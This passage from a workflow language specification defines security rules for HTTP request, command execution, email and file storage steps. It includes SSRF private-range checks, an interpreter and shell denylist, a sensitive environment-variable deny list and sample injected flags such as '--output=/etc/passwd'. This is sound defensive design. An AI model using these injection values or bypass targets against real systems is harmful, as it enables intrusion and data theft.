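_COMMIT_SHA = re.compile(r"[0-9a-fA-F]{7,40}")


def ref_of(flow_url: str) -> Optional[str]:
    """Return the value of the ?ref= query parameter, or None if absent."""
    values = parse_qs(urlsplit(flow_url).query).get("ref")
    return values[0] if values else None


def is_immutable_ref(ref: str) -> bool:
    """True when the ref looks like a commit SHA rather than a branch or tag."""
    return _COMMIT_SHA.fullmatch(ref) is not None


# Hypothetical URL, for illustration only.
url = "github://acme/flows/payment-processor.flowmarkup.yaml?ref=3f2a9c1"
pinned = ref_of(url)
```

A ref that fails `is_immutable_ref` (for example `main`) is the case where pairing with `integrity:` is advised.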

#### `request` -- HTTP Request

Requires `method:` and exactly one of `url:` (full URL) or `host:` (decomposed).

**Body forms:** `json` (auto Content-Type: application/json), `urlencoded`, `multipart`, `raw`, string shorthand.

**Authentication:** `auth.bearer` (engine prepends `Bearer `), `auth.basic` (engine base64-encodes).

> **Secret injection restriction.** `SECRET.*` values MUST NOT appear in `request.body`, `request.query`, or `request.url` fields. Secrets MUST be injected via `auth.bearer`, `auth.basic`, `request.headers` (for custom API key headers), or service `params:` to engine-managed services. Static analysis rule SA-SECRET-26 (ERROR) MUST reject `SECRET.*` references in request body, query, or URL fields. `request.headers` is a valid injection point for secrets — custom authentication headers (e.g., `X-API-Key`, `Ocp-Apim-Subscription-Key`) are legitimate and preferred over query parameters. SA-SECRET-18 (ERROR) separately prohibits secrets in query parameters. *(CWE-200)*

**Response output:** `status`, `headers`, `body`, `cookies`.

**`parseAs:`** -- optional response body content type for auto-parsing. Two forms:

- **String form:** bare constant (`JSON`, `YAML`, `XML`, `CSV`, `TSV`, `TEXT`, `BINARY`) or CEL `=` expression.
- **Object form:** `{ $kind?: JSON|..., $type?: ..., $name?: ... }` — attaches metadata to `RESULT.body` (e.g., `$name:` for a filename, `$type:` for a semantic MIME type like `application/vnd.api+json`). `$kind` also acts as the parse format when present.

When present, `RESULT.body` is auto-parsed: MAP for JSON/YAML/XML (XML uses the XML-to-MAP mapping convention from §1.3), ARRAY for CSV/TSV, STRING for TEXT, bytes for BINARY. When absent, `RESULT.body` remains a raw string. Parse failure raises `ParseError` with `ERROR.DATA.field: "body"`. Character encoding: HTTP `Content-Type` charset parameter provides the encoding (detection priority from §2.4 Character Encoding Detection applies). SA-REQ-13 (WARN) warns when `parseAs` is combined with `async: true` (async discards the response). SA-REQ-14 (INFO, engine-level) suggests `parseAs` when `RESULT.body.decode(FORMAT)` is used.

**`expect:`** -- validate status/contentType before result mapping. Mismatch throws `HttpError`.

**Auto-throw:** 4xx/5xx -> `HttpError` by default. When `status` is mapped in `result:`, auto-throw is suppressed.

**Options:** `followRedirects` (default true), `connectTimeout`, `readTimeout`, `timeout`, `maxResponseSize` (engine-configurable default).

**Redirect origin enforcement:** When the effective `REQUEST` capability is not `INHERIT`, the engine MUST validate each HTTP redirect target against the effective REQUEST allowlist before following. Redirects to origins not in the allowlist MUST be rejected with `ConnectionError`. This prevents SSRF attacks where an allowed origin redirects to internal or unauthorized endpoints. The engine MUST apply DNS resolution and private/internal IP validation (same ranges as §2.4 schema fetch) to each redirect target before following. Relative redirects (scheme-relative `//host/path` or path-relative `/path`) MUST be resolved against the original request URL and then validated. Maximum redirect chain depth: 10 (configurable). Each redirect hop counts toward the step's `timeout:`.

**Timeout hierarchy:** `connectTimeout` -> `readTimeout` -> `timeout` (entire step).

**Proxy:** Engine reads `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY` at startup. Flows cannot override per-step.

**Errors:** `ConnectionError`, `HttpError`, `TLSError`, `TimeoutError`.

**Response size limit:** The engine MUST enforce a configurable maximum response body size (default: 10 MB, maximum: 100 MB). Responses exceeding the limit raise `ResourceExhaustedError`. The limit applies to the decompressed response body. Streaming responses (`onYield:` / `$yields`) are exempt from the total size limit but each chunk is subject to the per-instance memory limit.

**Streaming:** Supports `onYield:` / `$yields` for SSE and chunked responses.

SA-REQ-11 (ERROR): Auth (`basic` or `bearer`) over the `http://` scheme MUST be rejected at static analysis time, except when the request URL targets a local address: `localhost`, `127.0.0.0/8`, `::1` (written `[::1]` in URLs), `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`. For local addresses, SA-REQ-11 severity is INFO. The engine-level `request.requireTlsForAuth` configuration (default: `true`) MAY override this exemption to enforce TLS even for local addresses.
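The severity decision for SA-REQ-11 can be sketched in Python as follows. This is a non-normative illustration for literal URLs only; the function names are hypothetical, and the `request.requireTlsForAuth` override is deliberately not modeled.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

# Local ranges listed by SA-REQ-11.
_LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _is_local(host: str) -> bool:
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # an ordinary hostname is not treated as local
    return any(address in net for net in _LOCAL_NETWORKS)


def sa_req_11_severity(url: str, has_auth: bool) -> Optional[str]:
    """Return "ERROR", "INFO", or None when the rule does not apply."""
    parts = urlsplit(url)
    if not has_auth or parts.scheme != "http":
        return None
    # urlsplit strips the brackets from IPv6 literals such as [::1].
    return "INFO" if _is_local(parts.hostname or "") else "ERROR"
```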

**SSRF prevention for CEL-computed URLs.** When `request.url` is derived from CEL expressions or user input, engines MUST validate the resolved URL against an allowlist of permitted schemes (default: `https`), hosts, and port ranges. Private/internal IP ranges (RFC 1918, RFC 4193, link-local, loopback) MUST be denied by default. DNS rebinding protection MUST be implemented by resolving the hostname, validating the resolved IP, and pinning it for the connection (item 4). The engine MUST evaluate the expression and validate the resulting URL before initiating the HTTP request:
1. The resolved URL scheme MUST be `http` or `https` only. Other schemes (`file`, `ftp`, `gopher`, `dict`, `ldap`) MUST be rejected. The default permitted scheme SHOULD be `https` only — engines MUST require explicit opt-in to allow `http`.
2. The resolved hostname MUST be validated against the REQUEST capability's allowed-origin list. The engine MUST also validate the port against a configurable allowed port range (default: 443 for `https`, 80 for `http`).
3. The resolved IP address (after DNS resolution) MUST be checked against the following private/reserved ranges and, by default, rejected if it falls within any of them: RFC 1918: `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`; RFC 4193: `fc00::/7`; link-local: `169.254.0.0/16`, `fe80::/10`; loopback: `127.0.0.0/8`, `::1`; CGNAT: `100.64.0.0/10`; IPv4-mapped IPv6: `::ffff:0:0/96`; current network / self-reference: `0.0.0.0/8`; documentation prefix: `2001:db8::/32`. This check MUST occur after DNS resolution to prevent DNS rebinding.
4. DNS rebinding protection: the engine MUST resolve the hostname, validate the resolved IP against private/internal ranges, pin the resolution result, and use the pinned IP for the actual connection. This prevents TOCTOU DNS rebinding attacks where the hostname re-resolves to an internal IP between validation and connection.
5. For redirect responses (301, 302, 307, 308), ALL of the above checks MUST be re-applied to the redirect target URL. The engine MUST enforce a maximum redirect chain length of 10.

Static analysis rule SA-REQ-15 MUST flag `request.url` expressions that incorporate user-controlled input without validation. *(CWE-918: Server-Side Request Forgery)*
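Checks 1 through 4 above can be sketched in Python as a single validate-and-pin step. This is a non-normative illustration: `validate_and_pin`, `UrlRejected`, and the injected `resolve` callable are hypothetical names, the host allowlist is simplified to exact hostnames, and the redirect handling of item 5 is not shown.

```python
import ipaddress
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit

_DENIED = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "fc00::/7",                                        # RFC 4193
    "169.254.0.0/16", "fe80::/10",                     # link-local
    "127.0.0.0/8", "::1/128",                          # loopback
    "100.64.0.0/10",                                   # CGNAT
    "::ffff:0:0/96",                                   # IPv4-mapped IPv6
    "0.0.0.0/8",                                       # current network
    "2001:db8::/32",                                   # documentation prefix
)]
_DEFAULT_PORTS = {"https": 443, "http": 80}


class UrlRejected(ValueError):
    """Raised when a resolved URL fails one of the SSRF checks."""


def validate_and_pin(url: str, allowed_hosts: Iterable[str],
                     resolve: Callable[[str], str],
                     allow_http: bool = False) -> Tuple[str, int]:
    """Return (pinned_ip, port) to connect to, or raise UrlRejected."""
    parts = urlsplit(url)
    permitted = {"https", "http"} if allow_http else {"https"}
    if parts.scheme not in permitted:                      # check 1
        raise UrlRejected(f"scheme not permitted: {parts.scheme!r}")
    host = parts.hostname
    if host is None or host not in set(allowed_hosts):     # check 2 (host)
        raise UrlRejected(f"host not in allowlist: {host!r}")
    port = parts.port or _DEFAULT_PORTS[parts.scheme]
    if port != _DEFAULT_PORTS[parts.scheme]:               # check 2 (port)
        raise UrlRejected(f"port not permitted: {port}")
    pinned_ip = resolve(host)                              # resolve once
    address = ipaddress.ip_address(pinned_ip)
    if any(address in net for net in _DENIED):             # check 3
        raise UrlRejected(f"resolved to a denied range: {pinned_ip}")
    return pinned_ip, port                                 # check 4: caller connects to this IP
```

Returning the resolved address, rather than the hostname, is what lets the caller connect to exactly the IP that was validated.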

#### `exec` -- System Command Execution

Runs a process directly without shell interpretation. Capability-gated.

**`command:`** is NOT CEL -- static plain string for capability validation. Schema-level enforcement: the `command` field rejects `=`-prefixed strings via the `^[^=]` pattern constraint. SA-EXEC-7 (shell metacharacters) provides a parallel structural enforcement; SA-EXEC-2 (command not in allowlist) provides additional static analysis protection.

| Property | Type | Description |
|---|---|---|
| `command` | plain string | REQUIRED. Executable name or path. |
| `args` | array or CEL | Each string item is CEL; non-strings pass through. |
| `workingDir` | CEL | Working directory. |
| `env` | object | Additional env vars. Merged with inherited. |
| `stdin` | CEL | Data written to stdin (once, pipe closed). |
| `parseAs` | string or object | Parse format for stdout. String: bare constant or CEL. Object: `{ $kind?, $type?, $name? }`. Default: `TEXT`. |
| `charset` | plain | Character encoding for stdout. Overrides auto-detection. |
| `stderrCharset` | plain | Character encoding for stderr. Overrides auto-detection. |

**Output:** `RESULT.stdout` (stdout content, auto-decoded via `parseAs:`), `RESULT.stderr` (always TEXT), `RESULT.exitCode`.

**Auto-decode:** `JSON`/`YAML`/`XML` -> structured CEL value. `CSV`/`TSV` -> list of maps (each row keyed by column headers from the first line). `TEXT` -> string. `BINARY` -> bytes. For all text-based types, the engine applies character encoding detection (see §2.4) to stdout bytes before format-specific parsing. Auto-decode failure (e.g., invalid JSON when `parseAs: JSON`) raises `ParseError` with `ERROR.DATA.field: "stdout"`. Stderr is always TEXT — decode manually via CEL `decode()` if structured stderr is needed.
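The `CSV`/`TSV` shape described above (a list of maps keyed by the header row) corresponds to what the following Python sketch produces. It is a non-normative illustration; `decode_delimited` is a hypothetical name, and leaving every cell as a string is an assumption, since the text does not specify type inference.

```python
import csv
import io
from typing import Dict, List


def decode_delimited(text: str, delimiter: str = ",") -> List[Dict[str, str]]:
    """Decode CSV/TSV text into one map per row, keyed by the first line."""
    reader = csv.DictReader(io.StringIO(text), delimiter=delimiter)
    return [dict(row) for row in reader]


rows = decode_delimited("id,status\n1,active\n2,closed\n")
```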

**Errors:** `ExecError` (non-zero exit, when `exitCode` not mapped), `MissingCapabilityError`, `TimeoutError`.

**Auto-throw suppression:** When `exitCode` is mapped, `ExecError` is not thrown.

Streaming stdout supported via `onYield:` / `$yields`.

SA-EXEC-10 (ERROR): rejects flows whose `EXEC` allowlist contains interpreter names (`python3`, `node`, `ruby`, `bash`, `sh`, `perl`, `php`), because allowlisting an interpreter effectively grants arbitrary code execution.

**Argument injection prevention.** Arguments derived from CEL expressions MUST NOT begin with a dash (`-`) unless explicitly allow-listed in the exec command's argument schema; engines MUST reject or escape leading dashes to prevent argument injection (e.g., `--flag` injection via user input). When `args` items are derived from CEL expressions that reference user-controlled input, the engine MUST reject any argument that begins with a dash (`-`) unless the argument appears in the step's `command` allowlist as a permitted flag. This prevents attackers from injecting command-line flags (e.g., `--output=/etc/passwd`, `-exec`) through user input. The engine MUST insert a `--` end-of-options separator before user-derived arguments by default, and MUST provide a configurable per-command exception list for commands that do not support `--` (e.g., commands that treat `--` as a literal argument). When a command is not in the exception list, `--` insertion is mandatory. Static analysis rule SA-EXEC-12 MUST flag CEL-derived args that do not pass through a validation function or are not constrained by a `$format` annotation. *(CWE-88: Improper Neutralization of Argument Delimiters in a Command)*
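One way an engine might assemble the argument vector under these rules is sketched below in Python. This is a non-normative illustration: `build_argv` and its parameters are hypothetical, and placing permitted flags before the `--` separator is a design choice of this sketch, made so that allow-listed flags are still interpreted as flags.

```python
from typing import FrozenSet, List, Sequence


def build_argv(command: str,
               static_args: Sequence[str],
               user_args: Sequence[str],
               permitted_flags: FrozenSet[str] = frozenset(),
               no_separator_commands: FrozenSet[str] = frozenset()) -> List[str]:
    """Build argv, rejecting user-derived flags that are not allow-listed."""
    flags: List[str] = []
    positionals: List[str] = []
    for arg in user_args:
        if arg.startswith("-"):
            if arg not in permitted_flags:
                raise ValueError(f"user-derived argument starts with a dash: {arg!r}")
            flags.append(arg)
        else:
            positionals.append(arg)
    argv = [command, *static_args, *flags]
    # Insert the end-of-options separator unless the command is on the
    # configured exception list.
    if command not in no_separator_commands:
        argv.append("--")
    return argv + positionals
```

Because no shell is involved, each element of the returned list reaches the process as exactly one argument.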

**Extended interpreter denylist.** The following interpreters and shells MUST be denied in both `exec.command` and `ssh.command` allowlists: `sh`, `bash`, `zsh`, `fish`, `ksh`, `csh`, `tcsh`, `dash`, `powershell`, `pwsh`, `cmd`, `cmd.exe`, `python`, `python3`, `ruby`, `perl`, `node`, `php`, `lua`, `tclsh`, `wish`, `osascript`, `expect`, `nohup`, `env`, `xargs`, `eval`, `java`, `javaw`, `dotnet`, `mono`, `groovy`, `scala`, `kotlin`, `swift`, `deno`, `bun`, `cscript`, `wscript`, `mshta`, `regsvr32`, and any executable containing `script` as a substring of the filename (case-insensitive). SA-EXEC-10 enforces the denylist for EXEC allowlists and SA-SSH-3 enforces it for SSH allowlists. Engines MAY extend this denylist via configuration. *(CWE-78: Improper Neutralization of Special Elements used in an OS Command)*
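A denylist check along these lines might look like the following Python sketch. It is a non-normative illustration: `is_denied_command` is a hypothetical name, and comparing the listed names case-insensitively is an assumption (the text only states case-insensitivity for the `script` substring).

```python
import re

_DENIED_NAMES = frozenset(
    "sh bash zsh fish ksh csh tcsh dash powershell pwsh cmd cmd.exe "
    "python python3 ruby perl node php lua tclsh wish osascript expect "
    "nohup env xargs eval java javaw dotnet mono groovy scala kotlin "
    "swift deno bun cscript wscript mshta regsvr32".split()
)


def is_denied_command(command: str) -> bool:
    """True when the executable's filename is on the extended denylist."""
    # Take the last path component, accepting both / and \ separators.
    filename = re.split(r"[\\/]", command)[-1].lower()
    return filename in _DENIED_NAMES or "script" in filename
```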

**Environment variable injection prevention.** Environment variable names derived from user input MUST be validated against a safe pattern (`[A-Z_][A-Z0-9_]*`, max 256 chars). Environment variable values derived from user input MUST NOT contain null bytes. Engines MUST deny setting security-sensitive environment variables (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_LIBRARY_PATH`, `PATH`, `HOME`, `SHELL`, `IFS`, `CDPATH`, `ENV`, `BASH_ENV`, `PYTHONPATH`, `NODE_PATH`, `RUBYLIB`, `PERL5LIB`, `CLASSPATH`) from user-controlled sources. When `exec.env` values are derived from CEL expressions referencing user-controlled input, the engine MUST validate that environment variable names conform to `^[A-Z_][A-Z0-9_]{0,254}$` and that values do not contain null bytes. Static analysis rule SA-EXEC-13 MUST flag `env` entries where the key or value references user-controlled input without validation. *(CWE-426: Untrusted Search Path)*
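The name, value, and sensitive-variable checks can be sketched in Python as below. This is a non-normative illustration using the anchored pattern quoted above; `check_env_entry` is a hypothetical name.

```python
import re

# The anchored pattern from the text. fullmatch() is used instead of ^...$
# because "$" in Python also matches just before a trailing newline.
_NAME = re.compile(r"[A-Z_][A-Z0-9_]{0,254}")

_SENSITIVE = frozenset({
    "LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "PATH", "HOME",
    "SHELL", "IFS", "CDPATH", "ENV", "BASH_ENV", "PYTHONPATH", "NODE_PATH",
    "RUBYLIB", "PERL5LIB", "CLASSPATH",
})


def check_env_entry(name: str, value: str) -> None:
    """Raise ValueError if a user-derived env entry must be rejected."""
    if _NAME.fullmatch(name) is None:
        raise ValueError(f"invalid environment variable name: {name!r}")
    if name in _SENSITIVE:
        raise ValueError(f"security-sensitive variable: {name}")
    if "\x00" in value:
        raise ValueError("value contains a null byte")
```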

#### `mail` -- Email Sending

Capability-gated (deny-by-default). Engine SMTP settings are opaque.

| Property | Required | Description |
|---|---|---|
| `from` | No | Sender address (CEL expression). Falls back to engine default when omitted. |
| `to`/`cc`/`bcc` | At least one | Recipients |
| `subject` | Yes | Subject line (CEL) |
| `body` | No | String shorthand or `{text:, html:}` |
| `attachments` | No | Bare variable ref or `{data:, name:, contentType:, inline:, contentId:}`. `contentType:` and `name:` override the value's `$type`/`$kind` and `$name` metadata — omit them when the value already carries the correct type (e.g. after `.encode(CSV)`). |
| `headers` | No | Custom headers |
| `priority` | No | HIGH / NORMAL / LOW |
| `smtp` | No | SMTP override (merged with engine defaults) |

**Output:** `message_id`, `timestamp`.

**Body optionality:** `body` is optional. An email with subject and recipients but no body is valid per RFC 5322.

**Recipient restrictions:** When the effective `MAIL` capability is an array (e.g., `MAIL: ["@example.com"]`), the engine MUST validate all `to:`/`cc:`/`bcc:` addresses against the allowlist before sending. `@domain.com` matches any local-part at that exact domain (case-insensitive domain, no subdomain matching). `user@domain.com` matches that exact address. Throws `MissingCapabilityError` on violation.
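The matching rules for allowlist entries can be sketched in Python as follows. This is a non-normative illustration: `recipient_allowed` is a hypothetical name, and comparing the local-part case-sensitively for full-address entries is an assumption of this sketch.

```python
from typing import Iterable


def recipient_allowed(address: str, allowlist: Iterable[str]) -> bool:
    """Match an address against "@domain" and "user@domain" entries."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        return False  # not a usable address
    domain = domain.lower()
    for entry in allowlist:
        entry_local, _, entry_domain = entry.rpartition("@")
        if entry_domain.lower() != domain:
            continue  # exact domain only, so subdomains never match
        if entry_local == "" or entry_local == local:
            return True
    return False
```

An engine would raise `MissingCapabilityError` for any recipient where this check returns `False`.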

**Sender validation (`from:`):** The `from:` field accepts a CEL expression for the sender address. Engine MUST restrict `from:` to addresses authorized by SMTP configuration (SPF/DKIM/DMARC alignment). SA-MAIL-13 emits an informational note when `from:` is explicitly set.

**HTML body security:** The engine MUST auto-escape `{{ }}` interpolation results in `body.html:` — all interpolated values have `<`, `>`, `&`, `"`, `'` replaced with their HTML entity equivalents before insertion. This prevents script injection from user-controlled data by default. To bypass auto-escaping for pre-sanitized content, use `htmlRaw(string) → HtmlSafeString` which marks the value as safe. `htmlEscape(string) → string` remains available for explicit use in CEL expressions (e.g., escaping values before string concatenation). SA-MAIL-14 (INFO) notes when `{{ }}` interpolation appears in `body.html:`. `body.text:` is plain text — no HTML parsing, safe from injection.

**`htmlRaw(string) → HtmlSafeString`** — marks a string as pre-sanitized HTML, bypassing auto-escaping in `body.html:` interpolation. **Security warning:** `htmlRaw()` MUST NOT be called on user-controlled input without prior sanitization — it bypasses the XSS protection that `{{ }}` auto-escaping provides. SA-MAIL-15 (ERROR) flags `htmlRaw()` on user-derived values. SA-MAIL-16 (ERROR) flags `htmlRaw()` used outside `body.html:` context. See R-SEC-11.

**`htmlEscape(string) → string`** — escapes `<`, `>`, `&`, `"`, `'` to their HTML entity equivalents. Available for manual use in CEL expressions.
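The interaction between auto-escaping and `htmlRaw()` can be modeled with a marker type, as in this Python sketch. It is a non-normative illustration: the Python names are hypothetical stand-ins for the CEL functions, and Python's `html.escape` emits `&#x27;` for the single quote, which is one of several valid entity spellings.

```python
import html


class HtmlSafeString(str):
    """Marker type for values that bypass auto-escaping."""


def html_raw(value: str) -> HtmlSafeString:
    # Marks the value as pre-sanitized; the caller is responsible for that claim.
    return HtmlSafeString(value)


def interpolate(value: object) -> str:
    """Render one interpolated value into an HTML body."""
    if isinstance(value, HtmlSafeString):
        return str(value)
    # Escapes <, >, &, " and ' before insertion.
    return html.escape(str(value), quote=True)
```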

**`htmlSanitize(html [, policy]) → string`** -- performs allowlist-based HTML sanitization.

- **Default policy (`"basic"`):** allows `<b>`, `<i>`, `<em>`, `<strong>`, `<a href>`, `<p>`, `<br>`, `<ul>`, `<ol>`, `<li>`, `<h1>`–`<h6>`, `<blockquote>`, `<code>`, `<pre>`.
- **`"strict"` policy:** text-only, strips ALL tags.
- **`"rich"` policy:** adds `<table>`, `<tr>`, `<td>`, `<th>`, `<img src alt>`, `<div>`, `<span>`.
- **All policies** strip event handlers (`on*`), `javascript:` URIs, `data:` URIs (except `data:image/png`, `data:image/jpeg`, `data:image/gif`, `data:image/webp`, and `data:image/avif` in `"rich"`; `data:image/svg+xml` is excluded because SVG can contain embedded JavaScript; `data:` URIs MUST NOT exceed 1 MB), CSS expressions, and `<script>`/`<style>`/`<iframe>` tags.
- **Explicit strip list (all policies):** `<script>`, `<style>`, `<iframe>`, `<frame>`, `<frameset>`, `<object>`, `<embed>`, `<applet>`, `<form>`, `<input>`, `<button>`, `<select>`, `<textarea>`, `<link>`, `<meta>`, `<base>`, `<svg>`, `<math>`, `<template>`, `<slot>`, `<portal>`, `<dialog>` (when containing interactive content), and all custom elements (tags containing a hyphen).
- **SVG exclusion:** `<svg>` and all SVG namespace elements (`<svg:*>`) are stripped in ALL policies including `"rich"`, because SVG enables script execution via `<svg onload>`, `<foreignObject>`, `<animate>`, and `<set>` elements, making safe SVG sanitization infeasible without a dedicated SVG sanitizer. Engines that wish to support SVG MUST provide a separate `svgSanitize()` function with its own allowlist.
- **Attribute strip list (all policies):** all `on*` event handler attributes, `style` attributes (except in `"rich"` policy where `style` is allowed but `expression()`, `url()`, `import`, and `behavior` values are stripped), `srcdoc`, `formaction`, `xlink:href`, `data-*` attributes (except in `"rich"` policy).
- **Reference implementation:** Engines SHOULD implement `htmlSanitize()` using DOMPurify (JavaScript), Bleach/nh3 (Python), or OWASP Java HTML Sanitizer; custom regex-based sanitizers are NOT acceptable. *(CWE-79)*

**MUST:** When `htmlRaw()` receives user-controlled input, the input MUST be passed through `htmlSanitize()` first. The recommended safe pattern is:
```yaml
body:
  html: =htmlRaw(htmlSanitize(user_input))
```
Direct use of `htmlRaw()` on unsanitized user input is a specification violation (SA-MAIL-15 ERROR).

**Errors:** `MailError`, `SmtpError`, `ConnectionError`, `TimeoutError`, `TLSError`, `RateLimitError`, `AddressError`, `AuthenticationError`, `ConfigurationError`, `MissingCapabilityError`.

**User-controlled recipient restriction.** When `mail.to`, `mail.cc`, or `mail.bcc` values are derived from user input or CEL expressions, engines MUST validate each resolved email address against the `MAIL` capability's allowlist of permitted domains or addresses BEFORE sending, and MUST reject recipient addresses that do not match the allowlist (open-relay prevention). If the MAIL capability is declared as `true` (unrestricted), static analysis rule SA-MAIL-20 MUST emit a WARN when recipient fields derive from user input, as this enables the flow to be used as an open mail relay. In strict security mode, SA-MAIL-20 MUST be elevated to ERROR severity, requiring explicit domain allowlists for any flow with user-derived recipients. Engines MUST enforce a per-step recipient limit (default: 50) and a per-flow-instance aggregate recipient limit (default: 200) to prevent abuse. *(CWE-79, CWE-183: Permissive List of Allowed Inputs)*

#### `storage` -- File Storage Operations

Performs file operations on engine-configured storage backends (S3, SFTP, SMB, FTP, local filesystem). Capability-gated (deny-by-default). The flow addresses backends by URL or provisioned alias. The engine resolves aliases and credentials (see [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.4 items 26 and 40 for alias resolution and backend registration). If the engine does not support a storage backend type, it raises `UnsupportedProviderError` at flow load time.

**`url:`** -- storage target. Three forms: (1) **bare alias** — engine-provisioned or parent-flow-provisioned name (e.g., `url: data`), resolved from the STORAGE mapping; (2) **literal URL** with a known scheme (`s3://`, `sftp://`, `smb://`, `ftp://`, `file://`); (3) **CEL expression** (`=` prefix, must evaluate to a URL string at runtime). REQUIRED for all operations except `transfer` (which uses `source.url` and `target.url`). Resolution order: CEL (`=` prefix) → literal URL (known scheme prefix) → bare alias (matches `^[a-z][a-z0-9_]*$`). Supported URL schemes: `s3`, `sftp`, `smb`, `ftp`, `file`.
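The resolution order for `url:` can be sketched in Python as a three-way classification. This is a non-normative illustration; `classify_storage_url` is a hypothetical name, and raising on anything that matches none of the three forms is an assumption of this sketch.

```python
import re

_SCHEME_PREFIXES = ("s3://", "sftp://", "smb://", "ftp://", "file://")
_ALIAS = re.compile(r"[a-z][a-z0-9_]*")


def classify_storage_url(url: str) -> str:
    """Apply the documented order: CEL, then literal URL, then bare alias."""
    if url.startswith("="):
        return "cel"
    if url.startswith(_SCHEME_PREFIXES):
        return "literal"
    if _ALIAS.fullmatch(url):
        return "alias"
    raise ValueError(f"not a CEL expression, supported URL, or alias: {url!r}")
```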

> **SSRF prevention for storage URLs.** When `storage.url` is a CEL expression, the engine MUST evaluate the expression and validate the resolved URL against the same SSRF prevention requirements as `request.url` (§4.3): scheme allowlisting, DNS rebinding protection, private IP range denial (RFC 1918/4193/link-local), and redirect enforcement. The `file://` scheme MUST be restricted to engine-configured root directories — resolved `file://` paths MUST NOT escape the configured root via symlinks, `..` segments, or canonicalization tricks. Static analysis rule SA-STORAGE-32 (ERROR) MUST flag `storage.url` CEL expressions that reference user-controlled input without URL validation. *(CWE-918: Server-Side Request Forgery)*

**`path:`** -- CEL expression for relative path within the storage endpoint. When both `url:` and `path:` are present, the engine appends `path` to the resolved URL (ensuring exactly one `/` separator). When only `url:` is present, the URL's path component is the full path.

**`operation:`** -- bare name. REQUIRED.

| Operation | Description | Requires |
|---|---|---|
| `get` | Download file content | read |
| `put` | Upload file content (creates parent dirs as needed) | write |
| `delete` | Delete file | write |
| `list` | List directory/prefix contents | read |
| `info` | Get file metadata (size, modified, etc.) | read |
| `exists` | Check if file exists | read |
| `mkdir` | Create directory | write |
| `copy` | Copy within same resolved URL authority | read + write |
| `move` | Move/rename within same resolved URL authority | read + write |
| `transfer` | Cross-storage streaming file transfer | read on source, write on target |

```yaml
- storage:
    _label_: "Human-readable"
    _id_: step_name
    url: data                       # bare alias (engine/parent-provisioned)
    # url: "s3://bucket"            # alternative: literal URL
    # url: =ENV.S3_URL              # alternative: CEL expression
    operation: get|put|delete|list|info|exists|mkdir|copy|move|transfer
    path: "<CEL expression>"        # optional, appended to resolved url
    data: "<CEL expression>"        # REQUIRED for put (file content to upload)
    parseAs: JSON|YAML|XML|CSV|TSV|TEXT|BINARY|CEL   # string or object; optional auto-parse for get
    # parseAs: {$kind: JSON, $type: ..., $name: ...}              # object form
    overwrite: true|false|CEL      # optional for put/copy/move/transfer (default: false)

    # For copy/move within same resolved URL authority:
    targetPath: "<CEL expression>"

    # For transfer (cross-storage):
    source:
      url: data                     # alias, literal URL, or CEL
      path: "<CEL expression>"
    target:
      url: "sftp://backup-host"     # alias, literal URL, or CEL
      path: "<CEL expression>"

    # For list pagination:
    cursor: "<CEL expression>"     # optional, pagination cursor from previous list
    limit: integer|CEL             # optional, page size

    # Cache hint (storage-only, advisory):
    cacheHint: "5m"                    # string shorthand: "<ttl>[/<revalidation>[/<scope>]]"
    # cacheHint: { ttl: 5m, revalidation: CONDITIONAL, scope: LOCAL }  # object form
    # cacheHint: true | false          # opt-in / opt-out

    # Universal action fields:
    condition: "<cel-expression>"
    timeout: duration
    retry: ...
    rateLimit: ...
    circuitBreaker: ...
    async: false
    result: ...
    onYield: ...
    errors: [StorageError, ...]
    rollback: [...]
    catch: ...
```

**`path:`** -- CEL expression for the relative file/directory path within the storage endpoint. Optional for single-URL operations (when the full path is included in `url:`); REQUIRED when `url:` is an alias or a base URL without a path component. **Path validation:** The engine MUST validate paths against traversal attacks. Validation MUST occur after all decoding and normalization (URL decoding, Unicode normalization, backslash-to-forward-slash conversion on Windows). The engine MUST reject paths containing: `..` path segments (in any encoding), null bytes (in any encoding), backslash characters on non-Windows providers, and control characters (U+0000-U+001F). For local filesystem providers, the engine MUST resolve the final path to its canonical absolute form and verify it falls within the configured storage root directory; symlink targets MUST be resolved before this check. Provider-specific path rules: S3 keys MUST NOT start with `/` or contain `//`; SFTP/SMB/FTP paths follow POSIX rules after normalization. SA-STORAGE-17 (ERROR) rejects path expressions containing URL-encoded sequences (`%2f`, `%2e`, `%00`) that decode to traversal characters.
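The decode-then-validate order can be sketched in Python as below. This is a non-normative illustration covering only the lexical checks: `validate_storage_path` is a hypothetical name, NFKC is an assumed choice of Unicode normalization, and decoding repeatedly until the string is stable is one way to handle nested encodings. Canonicalization against the storage root and provider-specific rules are not shown.

```python
import unicodedata
from urllib.parse import unquote


def validate_storage_path(raw: str, windows_provider: bool = False) -> str:
    """Return the normalized path, or raise ValueError on a traversal risk."""
    path = raw
    # Decode until stable so that double-encoded sequences such as
    # %252e%252e are also caught.
    while True:
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # NFKC folds look-alike forms such as fullwidth dots (assumed choice).
    path = unicodedata.normalize("NFKC", path)
    if windows_provider:
        path = path.replace("\\", "/")
    elif "\\" in path:
        raise ValueError("backslash in path on a non-Windows provider")
    if any(ord(ch) <= 0x1F for ch in path):
        raise ValueError("control character or null byte in path")
    if ".." in path.split("/"):
        raise ValueError("'..' path segment")
    return path
```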

**Symlink resolution and TOCTOU prevention.** Engines MUST resolve symlinks atomically using `O_NOFOLLOW` (or platform equivalent: `FILE_FLAG_OPEN_REPARSE_POINT` on Windows, `O_SYMLINK` on macOS) and `openat()` for directory-relative opens. The engine MUST use the file descriptor obtained during the open-and-verify step for all subsequent I/O — MUST NOT re-open the path. The double-check fallback (resolve-verify-open-verify) is NOT acceptable as it remains vulnerable to race conditions between the second verify and the I/O operation. The engine MUST also verify that no path component (not just the final component) is a symlink pointing outside the storage root. *(CWE-367)*
